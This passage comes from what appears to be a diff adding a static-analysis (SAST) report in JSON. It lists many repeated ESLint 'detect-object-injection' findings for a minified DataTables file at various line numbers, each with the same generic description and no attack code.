security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 301, + "end_line": 301, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 305, + "end_line": 305, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 673, + "end_line": 673, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 312, + "end_line": 312, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 331, + "end_line": 331, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 333, + "end_line": 333, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 344, + "end_line": 344, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 345, + "end_line": 345, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 346, + "end_line": 346, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 348, + "end_line": 348, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 351, + "end_line": 351, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 361, + "end_line": 361, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 362, + "end_line": 362, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 363, + "end_line": 363, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 365, + "end_line": 365, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 368, + "end_line": 368, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 379, + "end_line": 379, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 388, + "end_line": 388, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 389, + "end_line": 389, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 390, + "end_line": 390, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 391, + "end_line": 391, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 392, + "end_line": 392, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 393, + "end_line": 393, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 395, + "end_line": 395, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 396, + "end_line": 396, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 397, + "end_line": 397, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 400, + "end_line": 400, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 402, + "end_line": 402, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 403, + "end_line": 403, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 406, + "end_line": 406, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 408, + "end_line": 408, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 422, + "end_line": 422, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 436, + "end_line": 436, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 437, + "end_line": 437, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 438, + "end_line": 438, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 439, + "end_line": 439, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 440, + "end_line": 440, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", 